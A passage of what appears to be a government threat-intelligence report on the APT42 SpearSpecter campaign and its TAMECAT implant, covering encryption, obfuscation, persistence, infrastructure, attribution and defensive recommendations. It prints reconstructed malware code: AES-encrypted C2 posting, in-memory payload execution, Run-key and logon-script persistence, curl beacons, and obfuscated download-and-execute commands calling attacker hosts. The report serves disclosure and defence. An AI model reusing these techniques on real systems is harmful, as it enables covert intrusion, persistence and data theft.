operates as a modular in-memory loader that uses trusted system binaries and temporary artifacts to\r\nblend in with normal activity and minimize on-disk traces. 
It employs various obfuscation techniques to evade\r\ndetection and complicate analysis.\r\nIn this section, we explore TAMECAT's sophisticated and stealthy execution methods.\r\nTAMECAT Encryption Mechanism\r\nTAMECAT protects telemetry and controller payloads with an in-memory AES-256-CBC encryption mechanism,\r\nwhich it uses to send and receive data covertly. The first TAMECAT module places a couple of long-lived keys into global variables. Each request uses a fresh 16-character IV that is sent to the C2 so the actor can stay\r\nin sync. The mechanism is simple and repeated by all TAMECAT modules:\r\n• Use the key from the global variable.\r\n• Generate an IV.\r\n• Encrypt the data as a JSON envelope with the key and IV.\r\n• Send the data alongside the IV in a header.\r\n• Decrypt responses using the same key and IV.\r\nBecause the key is static and the IV travels in cleartext with each request, an analyst who recovers the key from the first module can decrypt captured traffic offline.\r\nThe initial module defines a global variable containing the AES key for later use, ensuring subsequent modules can\r\nencrypt and decrypt data.\r\nPowerShell\r\n# runtime key set into $global:emlgwwjgbz\r\n$global:emlgwwjgbz = \"g9944pf33sbuuuspi3z2er6rqh9ermxk\"\r\n...\r\nFigure 13: The key is injected into a global variable by the first module\r\nEach module generates a random IV and uses AES-256-CBC to encrypt outbound payloads into Base64-encoded\r\nciphertext. 
The encryption function accepts three parameters: the data to encrypt, the AES key, and the IV.\r\nPowerShell\r\nfunction IVGenerator() {\r\n$letters = ([char[]](65..90) + [char[]](97..122))\r\n-join (1..16 | ForEach-Object { $letters | Get-Random })\r\n}\r\nFigure 14: Per-request IV generator function\r\nPowerShell\r\nfunction AESEncryption {\r\nparam($plainText, $keyText, $ivText)\r\n$aes = [Security.Cryptography.Aes]::Create()\r\n$aes.BlockSize = 128\r\n$aes.KeySize   = 256\r\n$aes.Key = [Text.Encoding]::UTF8.GetBytes($keyText)\r\n$aes.IV  = [Text.Encoding]::UTF8.GetBytes($ivText)\r\n$enc = $aes.CreateEncryptor($aes.Key, $aes.IV)\r\n$ms = New-Object IO.MemoryStream\r\n$cs = New-Object Security.Cryptography.CryptoStream $ms, $enc, ([Security.Cryptography.CryptoStreamMode]::Write)\r\n$sw = New-Object IO.StreamWriter $cs\r\n# write the plaintext through the CryptoStream; Close() flushes the final padded block\r\n$sw.Write($plainText); $sw.Close()\r\n$base64 = [Convert]::ToBase64String($ms.ToArray())\r\n$aes.Dispose()\r\nreturn $base64\r\n}\r\nFigure 15: AES-256-CBC encryption function\r\nThese functions construct outbound payloads and wrap them in JSON. The JSON contains the Base64 ciphertext and\r\nrelevant metadata. 
The module places the random IV in a header named Sec-Host, which is required for the actor to\r\ndecrypt the data.\r\nPowerShell\r\n# key value fetched from the global variable\r\n$key = $global:emlgwwjgbz\r\n# random IV generation\r\n$iv = IVGenerator\r\n# Build envelope, encrypt with runtime key and per-request IV, send IV as Sec-Host\r\n$envelope = '\u003cdata\u003e'\r\n# call encryption function with key and iv\r\n$cipher = AESEncryption -plainText $envelope -keyText $key -ivText $iv\r\n# Send payload while inserting the IV into a field named Sec-Host\r\n$payload = @{ data = @{ json = $cipher }; 'Sec-Host' = $iv } | ConvertTo-Json\r\n# HTTP client object; MSXML2.XMLHTTP is assumed from the open/setRequestHeader/send calls below\r\n$http = New-Object -ComObject MSXML2.XMLHTTP\r\n$http.open(\"POST\", $c2url, $false)\r\n$http.setRequestHeader(\"Content-type\", \"application/json\")\r\n$http.setRequestHeader(\"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\")\r\n$http.send($payload)\r\nFigure 16: Encryption mechanism used across TAMECAT's modules\r\nInbound payloads from C2 are decrypted in the same way using an AES key stored in a global variable and the IV\r\nsupplied in the message. 
The payload is parsed as JSON, processed with several string manipulations, and executed\r\nentirely in memory.\r\nPowerShell\r\n# AES-256-CBC decrypt, the same mechanism as encryption\r\nfunction AESDecryption {\r\nparam($cipherB64, $keyText, $ivText)\r\n$aes = [Security.Cryptography.Aes]::Create()\r\n$aes.BlockSize = 128\r\n$aes.KeySize   = 256\r\n$aes.Key = [Text.Encoding]::UTF8.GetBytes($keyText)\r\n$aes.IV  = [Text.Encoding]::UTF8.GetBytes($ivText)\r\n$decryptor = $aes.CreateDecryptor($aes.Key, $aes.IV)\r\n$ms        = New-Object IO.MemoryStream ([Convert]::FromBase64String($cipherB64))\r\n$cs        = New-Object Security.Cryptography.CryptoStream $ms, $decryptor, ([Security.Cryptography.CryptoStreamMode]::Read)\r\n$sr        = New-Object IO.StreamReader $cs\r\n$plain     = $sr.ReadToEnd()\r\n$sr.Close(); $aes.Dispose()\r\nreturn $plain\r\n}\r\n\r\nfunction InboundPayloadHandler ($cipherB64, $ivText) {\r\n\r\n# decrypt using the shared runtime key and the IV supplied by the controller\r\n$jsonPlain = AESDecryption -cipherB64 $cipherB64 -keyText $global:emlgwwjgbz -ivText $ivText\r\n\r\nif ($jsonPlain -ne \"\" -and $jsonPlain -ne $null) {\r\n$obj = $jsonPlain | ConvertFrom-Json\r\n\r\n# controller bundles are delivered as an array of chunks\r\n[string[]]$chunks = $obj.TwuLwMA\r\n# reassemble the Base64 module text from its chunks\r\n$moduleB64 = -join $chunks\r\n...\r\n\r\n# Decode to script text\r\n[string]$moduleText = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($moduleB64))\r\n\r\n# Run in memory with Invoke-Expression, resolved through a wildcard\r\n\u0026 (Get-Command '*ke-e*') $moduleText\r\n}\r\n}\r\nFigure 17: In-memory inbound handler for decryption and execution.\r\nTAMECAT Code Obfuscation and Payload Stitching\r\nTAMECAT leans on noisy layers that look random but stitch into a predictable pattern. 
Payloads are split into dozens\r\nof Base64 shards, reassembled at runtime, decrypted in memory, and executed through wildcard command resolution.\r\nNames are long and meaningless, delaying comprehension while keeping the core logic small and reusable.\r\nAcross this article, we showed a clean, minimally obfuscated slice for readability, but the live modules are far more\r\ncompact and obfuscated. This section describes some of TAMECAT's obfuscation techniques and shows original\r\ncode sections.\r\nOne technique reconstructs a payload from many encrypted fragments, decrypts the assembled blob, and runs the\r\nresult entirely in memory; another builds payloads from hundreds of indexed fragments.\r\n
Figure 18: Dozens of strings are stored in variables\r\nPowerShell\r\n# Assign the base64 strings into an array\r\n$ZBoX33QFfKdgZE = @(\r\n$oapHLApBov7, $GceYk8nlH9D, $TnSxKpKw7Cm, $V4G20mrXfle, $WSETZrcqJz8, $MIFyxzJOlVL,\r\n$hWXZ7Zz8wFV, $CEjKzdXzt7Q, $aYpoinnbuuR, $4kJvAu3HPMB, $gFTki6IHaUq, $0FXZthzqeHP,\r\n$GFitrvN9eTI, $Mukz45kpVZ0, $PVoBqFYU478, $S9hIpIiUGjV, $rSrLPl0TBHDo, $QdS86omIsar,\r\n$4ln6SFRvKLZ, $LHe5EXHAFv, $PBtb3KDWPlj, $dE0VKZtCl6k, $xUHiWelH9n8, $ARVcTt19uiS,\r\n$3STPdSzmYsl, $4O7S2IlfVW4, $f2SZXBufNqR, $j4LhxRgZNAs, $1xGDQvAkBkg, $tnBXMxesAOy,\r\n$w3Rxe8UqQyb, $rbydSW9iUWz, $6erQwzJsbfe, $nSjibO3iIO5, $XQEsDcfJyPB, $fKFrpqAI4OI,\r\n$i2hTkjAapwG, $khzr4pdQuAZ, $fqHC0dyiobc, $uG8ZsSK4kFE, $4EVITpBAT5C, $jmExzgCAyvy,\r\n$HUtkxenYzm2, $zLt0W64tOXMO, $kAEv1GPetZ5, $MMiiqYTKy4k, $GPNqAnY1dqp, $WqoVM2BUIIZ,\r\n$HPzPWvaCt2q, $kj4YzU1tewu, $SrrDB30rNJo, $YI19jkF78jk, $ZWERzweq0Nf, $yg1jQkR5fE0,\r\n$tWgYhztYX7r, $1IC6EWQBuDQN\r\n)\r\n\r\n# Assemble fragments at runtime\r\n$ASBLBdU = \"\"\r\nforeach ($id in $ZBoX33QFfKdgZE) { $ASBLBdU += $id }\r\n$ASBLBdU = $ASBLBdU.Trim()\r\n\r\n# decrypt and run in memory\r\n$gIBoIu38LeWRVZLc = f8qnfbxr($ASBLBdU)\r\n\u0026 (gcm i*?-e*n) $gIBoIu38LeWRVZLc\r\nFigure 19: Build and run a giant Base64-encrypted payload from many small pieces\r\nPowerShell\r\nluelriciuewwubjtc ( $tpf[6]+ $zxr[0]+ 
$mhx[1]+ $yk6[3]+ $ul0[7]+ $zoo[0]+ $mxe[5]+ $dof[0]+\r\n$kzm[0]+ $smn[0]+ $pko[0]+ $zdu[1]+ $sc1[3]+ $scb[6]+ $you[0]+ $pmj[1]+ $pio[0]+ $seq0[4]+\r\n$lba[1]+ $spo[7]+ ... $tok[3]+ $ofm[0]+ $xfa[3]) @( \"$global:emlgwwjgbz\", \"$global:qraznczsewhv\",\r\n\"$global:zxcxjmutuxhv\", \"$global:nhprewmg\", \"$global:ahennlazfxwfydhaxo\", \"$global:fxuadbcdn\" )\r\nFigure 20: Payload assembled from hundreds of indexed fragments\r\nAnother technique in TAMECAT's arsenal appears when the loader receives a controller payload from C2. The\r\nloader injects live configuration into the unpacker at runtime, so the decrypted module receives fresh endpoints and\r\ncredentials only when it runs. This keeps static samples sterile and forces analysts to capture runtime state to recover\r\nthe true C2 addresses, keys, and webhook values. The pattern is straightforward and effective:\r\nthe loader defines a set of global variables, and the unpacker replaces short placeholder tokens in the decrypted\r\nscript with references to those globals before compiling and executing the result in memory.\r\nPowerShell\r\n# runtime globals injected by the loader\r\n$global:C2Endpoint    = \"hxxps[://]zx3nkaavlai[.]map[.]azionedge[.]net\"\r\n$global:DiscordChannel  = \"hxxps://discord[.]com/api/channels/{REDACTED}\"\r\n$global:EncryptionKey  = \"g9944pf33sbuuuspi3z2er6rqh9ermxk\"\r\n.....\r\n# Decode and decrypt the ciphertext into plaintext script\r\n.....\r\n# swap short tokens inside the decrypted script for the live globals\r\ntry {\r\n$decryptedScript = $decryptedScript.Replace($placeholderArray[1], '$global:C2Endpoint')\r\n$decryptedScript = $decryptedScript.Replace($placeholderArray[0], 
'$global:EncryptionKey')\r\n$decryptedScript = $decryptedScript.Replace($placeholderArray[4], '$global:DiscordBot')\r\n.....\r\n}\r\n# compile and run the final controller in memory\r\n$scriptblock = [Scriptblock]::Create($decryptedScript)\r\n\u0026 $scriptblock\r\nFigure 21: Global variables are placed into the decrypted payload\r\nLiving-off-the-Land Binaries (LOLBins)\r\nTAMECAT relies on trusted, signed Windows binaries and common user tools. In addition to using PowerShell's\r\npowerful features, the actor leverages other trusted binaries, including conhost.exe, cmd.exe, curl.exe, and\r\nmsedge.exe, to make malicious actions appear as normal system activity.\r\nConhost.exe is a signed console broker that can host console workloads without displaying a window. TAMECAT\r\nuses Conhost to run a batch script in the background:\r\nconhost --headless C:\\Users\\Public\\Microsoft.bat\r\nTAMECAT uses curl.exe to send and receive information between the compromised host and the attacker's C2\r\nservers. Example of a POST request sent by curl and used as a telemetry or beacon channel:\r\ncurl.exe -X POST \"https://\u003cFIREBASE-ENDPOINT\u003e.json\" -H \"Content-Type: application/json\" -d \"{\\\"LastUpdatTime\\\":{\\\".sv\\\":\\\"timestamp\\\"}}\" --ssl-no-revoke\r\nTAMECAT also leveraged msedge.exe to harvest personal browser data, as described in the Data Harvesting\r\nsection above.\r\nUser Deception via Fake Document\r\nTo minimize user suspicion, TAMECAT executes a PowerShell routine that launches a OneDrive document in Edge,\r\nsimulating legitimate user activity while the in-memory loader runs in the background. 
TAMECAT initiates MSEdge\r\nto show benign content:\r\nstart msedge \\\"\"hxxps[://]1drv[.]ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\\\";\r\nMemory-Resident Operations and Reduced Forensic Traces\r\nTAMECAT executes most of its functionality directly in memory. Earlier Google reports indicate that the malware\r\nwas writing a victim identifier to %LOCALAPPDATA%\\config.txt. In the sample we analyzed, that identifier is instead\r\nstored in the user registry key HKCU:\\SOFTWARE\\MSCore\\config, reflecting the actor's ongoing efforts to minimize\r\non-disk artifacts and reduce forensic detection. This demonstrates TAMECAT's evolution toward stealthier, memory-resident operations with a smaller disk footprint.\r\nLeveraging Cloudflare Workers for Resilient C2\r\nTAMECAT leverages Cloudflare Workers (e.g., *.workers.dev) as a serverless C2 edge, offering significant\r\nadvantages to the adversary. Traffic to Cloudflare blends seamlessly with normal web browsing and is widely\r\npermitted, while the edge conceals the true origin infrastructure. This setup simplifies maintenance and delivers low-noise, resilient command traffic that is difficult to block with simple network rules. 
The use of Cloudflare's\r\ninfrastructure, including Workers, for staging and command-and-control has become increasingly common in APT\r\ncampaigns over the past few years.\r\nSurviving the Reboot - TAMECAT's Persistence Mechanisms\r\n\"Renovation\" Run Key\r\nTAMECAT's persistence module drops a disposable batch file (v.bat) into a List folder under the user's Internet Explorer\r\nprofile and creates a per-user Run registry value named Renovation.\r\nThe command enumerates all items in the List folder and starts each one.\r\nPowerShell\r\nSet-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'Renovation' -Value 'cmd /c \"for %a in (\"%localappdata%\\Microsoft\\Internet Explorer\\List\\*\") do ( start \"\" \"%a\" )\"'\r\nFigure 22: Creation of the Renovation Run value that launches every file in the List directory at logon\r\nThis value executes v.bat at every interactive logon, which in turn launches the backdoor\r\n(fhgPczTORoCNEDsm.txt). The batch file is obfuscated with randomized noise tokens that are stripped at runtime to\r\nreconstruct a command executing the loader in memory via PowerShell:\r\nPowershell -w 1 \"$PbwpcDxXtAnaGrsu=(Get-Content -Path C:\\Users\\victim\\AppData\\Local\\Microsoft\\Windows\\AutoUpdate\\fhgPczTORoCNEDsm.txt); \u0026(gcm i*x)$PbwpcDxXtAnaGrsu\"\r\nBefore creating the Renovation Run value, the sample sets console compatibility values so the command prompt\r\nenvironment behaves predictably when the staging loop runs. Specifically, the actor writes DelegationConsole and\r\nDelegationTerminal registry values that point command-line handling to conhost.exe and ensure child processes\r\nlaunched from the console run in the expected terminal host. 
Setting these values before creating the Run entry\r\nensures launched commands inherit a consistent console host context, reducing the chance that alternative terminal\r\nhosts or compatibility settings will break the loader.\r\nPowerShell\r\n# Ensure the Console\\%Startup% registry key exists for the current user\r\n$consoleKeyPath = \"HKCU:\\Console\\%Startup%\"\r\n\r\nif (-not (Test-Path -Path $consoleKeyPath)) {\r\nNew-Item -Force -ItemType Directory -Path $consoleKeyPath\r\n}\r\n\r\n# GUID used to direct console hosting to conhost.exe\r\n$consoleGuid = \"{B23D10C0-E52E-411E-9D5B-C09DF709C7D}\"\r\n\r\n# Set DelegationConsole and DelegationTerminal so launched consoles use the expected host\r\nNew-ItemProperty -Force -Path $consoleKeyPath -Name \"DelegationConsole\" -PropertyType String -Value $consoleGuid\r\nNew-ItemProperty -Force -Path $consoleKeyPath -Name \"DelegationTerminal\" -PropertyType String -Value $consoleGuid\r\nFigure 23: Creation of DelegationConsole and DelegationTerminal registry values\r\nThe \"UserInitMprLogonScript\" Mechanism\r\nAn auxiliary persistence channel is maintained via a hidden batch script named Microsoft.bat, configured to run at\r\nevery logon via the per-user UserInitMprLogonScript registry value.\r\nThis script acts as a lightweight beacon, communicating with a Firebase Realtime Database under a per-host path\r\n(e.g., OutlookStandaloneUpdate/\u003chost-id\u003e), posting server-side timestamps to signal host availability:\r\nBatch\r\nchcp 65001\r\ncurl -X GET \"hxxps://{REDACTED}.firebaseio[.]com/OutlookStandaloneUpdate/\u003chost-id\u003e/LastUpdate.json\" --ssl-no-revoke\r\ncurl -X POST \"hxxps://{REDACTED}.firebaseio[.]com/OutlookStandaloneUpdate/\u003chost-id\u003e.json\" ^\r\n  -H \"Content-Type: 
application/json\" ^\r\n  -d \"{\\\"LastUpdateTime\\\":{\\\"\\\\x2esv\\\":\\\"timestamp\\\"}}\" --ssl-no-revoke\r\nFigure 24: Reconstructed Microsoft.bat content\r\nThe registry value set to enable this:\r\nPowerShell\r\n# PowerShell does not map the HKU: drive by default, so expose HKEY_USERS first\r\nNew-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null\r\n# Using the per-user HKU path for the targeted SID\r\n$envPath = \"HKU:\\\u003cSID\u003e\\Environment\"\r\nSet-ItemProperty -Path $envPath -Name \"UserInitMprLogonScript\" -Value \"conhost --headless C:\\Users\\Public\\Microsoft.bat\"\r\nFigure 25: Creation of the UserInitMprLogonScript registry value\r\nSpearSpecter Infrastructure \u0026 Attribution Breakdown\r\nOur investigation assesses with high confidence that the SpearSpecter campaign is operated by Iranian state-aligned\r\noperators working on behalf of, or in close coordination with, the Islamic Revolutionary Guard Corps Intelligence\r\nOrganization (IRGC-IO). This conclusion is based on robust technical evidence, including distinctive infrastructure\r\npatterns, highly tailored social-engineering tradecraft, and the deployment of custom malware such as TAMECAT,\r\nall of which are consistent with operations publicly attributed to APT42 and related IRGC-IO units.\r\nThe SpearSpecter campaign's infrastructure reflects a sophisticated blend of agility, stealth, and operational security\r\ndesigned to sustain prolonged espionage against high-value targets. The operators leverage a multifaceted\r\ninfrastructure that combines legitimate cloud services with attacker-controlled resources, enabling seamless initial\r\naccess, persistent command-and-control (C2), and covert data exfiltration. 
Notably, Google / Mandiant documents\r\nAPT42 operating multiple infrastructure clusters in parallel and abusing Google Sites to funnel victims to fake\r\nlogins, alongside NICECURL and TAMECAT malware-based operations, patterns we also observe in SpearSpecter.\r\nEach cluster employs different infrastructure sets (e.g., distinct lure domains/CDNs, separate delivery hosts, varied\r\nC2 fronting) yet shares the same tooling and objectives of credential theft, data theft, and long-term espionage. In\r\npractice, this explains minor infrastructure divergences across incidents without weakening the attribution: the\r\nclusters differ in infrastructure, not in mission or tradecraft.\r\nFigure 26: Diamond Model representation of SpearSpecter (APT42).\r\nInfrastructure and Tradecraft Overview\r\nOur investigation identified tools, infrastructure components, and operational patterns within SpearSpecter that\r\nstrongly align with activity historically attributed to APT42.\r\nTooling and Capabilities\r\nThe presence of TAMECAT, an implant enabling arbitrary PowerShell/C# execution over HTTP(S) via Base64\r\ntasking, and the Runs.dll component used for data preparation and exfiltration reinforces the APT42 link. This\r\ncombination mirrors the actor's documented preference for reusing familiar implants and lightweight helpers to\r\nsustain access and move data quietly, aligning with prior APT42 operations and our weighting on capability/tool\r\nreuse.\r\nOperational Security (OPSEC) Consistency\r\nSpearSpecter shows repeatable OPSEC habits that help tie activity together.\r\nThese behaviors follow a delivery pattern publicly attributed to APT42/CharmingCypress by Google/Mandiant and\r\nVolexity. Delivery typically involves an .LNK shortcut file that impersonates a decoy document (for example, a\r\nPDF). 
The LNKs embed obfuscated command lines that are repaired at runtime, and some chains launch PowerShell\r\nstagers that read TAMECAT modules from the attacker's command-and-control infrastructure and invoke them in memory.\r\nFirst, as part of the initial access phase, an .LNK file (impersonating a PDF) contained deliberately garbled\r\ncommands that are repaired at runtime by removing filler characters. This rebuilds a command, then renames the\r\ndownloaded file, and finally executes it:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c set hm=\"cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt htolbtps[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 \u0026 rename vgh.tolbxt temolbp.baolbt \u0026 %%tmolbp%% \" \u0026 call %%hm:olb=%%\r\nThe same pattern appears in known NICECURL activity linked to APT42, shown in the Google / Mandiant write-up.\r\nThe actor rebuilds the real curl/POST command that writes to %temp% and then executes it, matching the download,\r\nrename, execute sequence we observed:\r\ncmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=CgYEFk\u0026Prog=2_Mal_vbs.txt\u0026WH=Form.pdf\\\" -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\\\down.v7bs \u0026 call %c:7=% \u0026 set b=sta7rt \\\"\\\" \\\"%temp%\\\\down.v7bs\\\" \u0026 call %b:7=%\r\nSecond, as part of the TAMECAT persistence process, a PowerShell script reads commands from a local file and runs\r\nthem in memory using \"Invoke-Expression\", which the attacker obfuscates with a wildcard to evade detection.\r\npowershell -w 1 \"$Pbwpc=(Get-Content -Path 'C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Microsoft\\Windows\\AutoUpdate\\fhgPczTORoCNEDsm.txt'); \u0026(gcm \"i*x) $Pbwpc\"\r\nThe pattern mirrors APT42 (CharmingCypress) tradecraft publicly described by Volexity, where PowerShell is used\r\nwith string replacement and wildcards 
to resolve Invoke-Expression before executing the payload:\r\npowershell -w 1 $pnt=(Get-Content\" -Path C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\Microsoft\\documentLoger.txt); \u0026(gcm \"i*x)$pnt\r\nThird, we observed a string-construction obfuscation technique in TAMECAT (e.g., fhgPczTORoCNEDsm.txt),\r\nconsistent with public reports on APT42. The implant pieces together a hidden value by taking single characters from\r\nmany small arrays, an obfuscation technique that reconstructs a C2 URL or command without writing it plainly in\r\nthe code.\r\nluelriciuewwubjtc($tpf[6]+$zxr[0]+$mhx[1]+$yk6[3]+$ul0[7]+$zoo[0]+$mxe[5]+$dof[0]+$kzm[0]\r\nThis matches the technique shown in Google / Mandiant's example (Borjol(...)) where tokens are stitched from\r\narray indices before execution:\r\nBorjol($wvp[5]+$xme[2]+$nwk[3]+$vrl[3]+$gzk[4]+$ni2[0]+$tkk[2]+$kq4[0]+$yoe[4]+$jwv[0]+$ywa[0]+$sxi[5]+$bw9[12]+$kgu[1]+$mdi[0]+$ruz[3]+$byh[3]+$sja[3]+$wqf[0]+$wof[2]+$mg4[1]+$rfi[5]+$dt9[11]+$qgv[9]+$jt5[0]+$lli[1]+$owd[4]+$lp2[6]+$wkb[2]+$zen[7]+$sro[0]+$ta8[0]+$kg9[0]+$esk[8]+$ci4[5]+$oyx[0]+$ico[1]+$xy9[1]+$vvl[0])\r\nAcross three independent behaviors (misspell-then-repair command lines, runtime-resolved PowerShell execution,\r\nand array-index string construction) we see a coherent, repeated OPSEC pattern: hide the strings, resolve or repair them at\r\nruntime, then execute. 
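The set/call substitution seen in the two command lines quoted in this section can be emulated mechanically during triage. The Python helper below is an added example, not code from this report or from the actor: it applies cmd's %VAR:old=new% rewrite to recover the command a sample would actually run, and flags command lines that rely on the trick. The two inputs are the command lines quoted above, re-typed as single-line constructed samples.

```python
import re

# Matches the actor's 'call %NAME:OLD=NEW%' step (or the batch-file form with
# doubled percent signs) that repairs a deliberately misspelled command before
# it runs. Example from the report: call %%hm:olb=%%  (strip every 'olb').
CALL_RE = re.compile(
    r'call[ \t]+%{1,2}(?P<name>[A-Za-z_][A-Za-z0-9_]*):(?P<old>[^=%]+)=(?P<new>[^%]*)%{1,2}',
    re.IGNORECASE,
)


def repair_set_call(cmdline: str) -> list:
    """Emulate cmd's set/call substitution trick and return the recovered commands.

    For every 'call %NAME:old=new%' the value of the nearest preceding
    'set NAME=' is taken (up to the '&' that chains it to the call),
    doubled percent signs are collapsed, and the actor's own substitution is
    applied. Environment references such as %tmp% are left symbolic because
    their value depends on the victim host.
    """
    recovered = []
    lowered = cmdline.lower()
    for m in CALL_RE.finditer(cmdline):
        name, old, new = m.group('name'), m.group('old'), m.group('new')
        tag = 'set ' + name.lower() + '='
        start = lowered.rfind(tag, 0, m.start())
        if start < 0:
            continue  # call without a matching set: nothing to repair
        value = cmdline[start + len(tag):m.start()]
        # drop the '&' that chains 'set' to 'call', plus surrounding whitespace
        value = value.rstrip().rstrip('&').rstrip()
        value = value.replace('%%', '%')
        recovered.append(value.replace(old, new))
    return recovered


def uses_set_call_repair(cmdline: str) -> bool:
    """Detection helper: True when a command line relies on the trick at all."""
    return CALL_RE.search(cmdline) is not None


# Constructed samples: the two command lines quoted above, re-typed on one line
# each as they would appear in process-creation telemetry.
SPEARSPECTER_LNK = (
    '\"C:\\Windows\\System32\\cmd.exe\" /c set hm=\"cmolbd /c colburl --ssolblno-revoolbke '
    '-o vgh.tolbxt htolbtps[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 & '
    'rename vgh.tolbxt temolbp.baolbt & %%tmolbp%% \" & call %%hm:olb=%%'
)
NICECURL = (
    'cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf\" '
    '-X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs & call %c:7=% & '
    'set b=sta7rt \"\" \"%temp%\\down.v7bs\" & call %b:7=%'
)

if __name__ == '__main__':
    for sample in (SPEARSPECTER_LNK, NICECURL):
        print('flagged:', uses_set_call_repair(sample))
        for cmd in repair_set_call(sample):
            print('  ->', cmd)
```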
That consistency strengthens the linkage to APT42 in SpearSpecter.\r\nNetwork Infrastructure\r\nSpearSpecter's campaign infrastructure supports initial access, payload delivery, and command-and-control using a\r\nlayered mix of attacker-controlled and cloud-based services.\r\nStage one arrives via a deep, randomized path on filenest[.]info , which redirects to cloudcaravan[.]info ,\r\nwhich abuses the Windows search-ms URI handler to trigger user-driven execution.\r\nStage two then fetches a malicious .LNK from datadrift[.]somee[.]com (a WebDAV-backed host on Somee, a\r\nfree shared-hosting platform that this actor has leveraged in other operations for quick, disposable delivery\r\ninfrastructure).\r\nAfter initial access, operations pivot to the commodity cloud for staging/C2 edges. We observed requests through\r\nfilenest[.]osc-fr1.scalingo.io (multi-tenant PaaS) that linked with others APT42 operations and requests to\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 45 of 48\n\nhosted components on s3[.]tebi[.]io (S3-compatible object storage) was previously reported in TAMECAT\r\nactivity.\r\nTaken together, somee/filenest for ephemeral delivery, synchronized domain activity ( somee[.]com ), and\r\nScalingo/Tebi for staging, this layered, cloud-heavy footprint is consistent with APT42 operations.\r\nVictimology and Targeting\r\nSpearSpecter activity clusters around senior government and defense officials, consistent with APT42's pathway to\r\nsustained intelligence collection on behalf of IRGC-IO. In our case, lures that impersonate legitimate services are\r\npaired with short-lived delivery hosts and cloud telemetry to persist in targeted accounts and enable selective, long-term exfiltration.\r\nNotably, we also observed direct outreach via WhatsApp, consistent with past APT42 operations. The operators\r\ndemonstrate high-end social-engineering tradecraft. 
They first gather detailed personal and professional context on a\r\ntarget, then initiate contact while impersonating a role or service aligned with that context, which materially\r\nincreases trust and conversion rates. The who (senior officials) and the how (context-driven social engineering to\r\nbuild trust, followed by credential theft and cloud-based persistence) align with the actor's documented mandate and\r\ntradecraft.\r\nTimeline Analysis\r\nThe infrastructure and activity unfolded on a tight, coordinated timeline:\r\ncloudcaravan[.]info and filenest[.]info were both created on 2025-08-17 at 00:00:00 UTC, coming online\r\nconcurrently and consistent with pre-planned, paired staging rather than opportunistic reuse.\r\nAttribution Conclusion\r\nThese infrastructure components routinely enable payload delivery, C2 communication, and data exfiltration\r\nprocesses within APT42's arsenal and campaign.\r\nThis detailed analysis of tools, techniques, and network infrastructure provides strong corroborative evidence linking\r\nSpearSpecter's operational footprint to APT42. It highlights the adversary's sophisticated use of obfuscation, cloud\r\nplatforms, and familiar modular implants for stealthy persistence and data theft in support of Iranian state-sponsored\r\nespionage.\r\nInsights / Recommendations\r\nThe INDA recommends the following to strengthen the organization's security posture against the APT42\r\nSpearSpecter campaign, in particular, and the APT42 operation in general.\r\nVisibilities \u0026 Monitoring\r\nVisibility and monitoring are key in early identification of the campaign and can help contain the attack before any\r\nvaluable data is exfiltrated.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 46 of 48\n\nBecause almost all payloads run only in memory (fileless), a mature host-based visibility is needed. 
Among other\r\nthings, PowerShell script block logging should be enabled, Sysmon should be installed and configured to report to a\r\nSIEM solution, and an EDR product should be installed.\r\nWe recommend building behavior rules based on the TTPs outlined in this article and monitoring for the IOCs\r\nattached.\r\nIf you believe you may be a target of interest to the IRGC, we recommend using the TTPs and IOCs to perform a\r\nretro hunt across your environments.\r\nEmployee Awareness\r\nAPT42's main initial access tactic is social engineering, mainly targeting high-value targets. Keeping that in mind,\r\nthe organization should prioritize investing in educating senior employees, especially those who may possess data of\r\ninterest to the IRGC.\r\nEducation efforts should emphasize the sophistication of the social engineering used by the group, and should urge\r\nvigilance even when approached by someone from a known organization on a known messaging platform like\r\nWhatsApp, even if the language used seems correct.\r\nEducating users to always double-check with a known and trusted member of the organization that the person is real\r\nand genuinely the one who approached them can significantly reduce the attack vector the group uses.\r\nDisable \"search-ms\" URI protocol handler\r\nAbuse of the search-ms protocol for payload delivery is on the rise. Many threat actors use it to share malware with\r\nvictims without sending files directly, which may be caught by security products. 
Disabling the search-ms protocol\r\ncan block attackers from sharing the file and serve as a countermeasure to prevent other attacks.\r\nYou can disable the search-ms protocol by running the following command in the Windows Registry Editor:\r\nreg delete HKEY_CLASSES_ROOT\\search /f\r\nreg delete HKEY_CLASSES_ROOT\\search-ms /f\r\nThis prevents the protocol from being used to launch Windows file searches from links or other applications.\r\nNetwork Monitoring \u0026 Filtering\r\nRecent changes by APT42 include using legitimate services as infrastructure, such as Cloudflare workers, Google\r\nFirebase, Discord, and Telegram. Defenders must stay vigilant, even to benign activity. Build a baseline of network\r\nactivity and alert on any deviation, even those made to benign services.\r\nIn addition, it is recommended to use a proxy to filter network activity. While it can't block requests to legitimate\r\nservices later in the attack, it may stop the first stages that use known attacker infrastructure. During incident\r\nresponse, this enables investigators to inspect network activity and build a full picture of the attack.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 47 of 48\n\nMoreover, using a proxy tool with packet inspection capabilities can help detect some of the attacker's activity in the\r\nnetwork, such as an IV key in the HTTP Sec-Host header. Additionally, if the organization knows it doesn't use\r\nTelegram or Discord for its business operations, it can block them as well.\r\nEndpoint Hardening\r\nAPT42 leveraged fileless payloads to evade traditional detection. Most of their activity 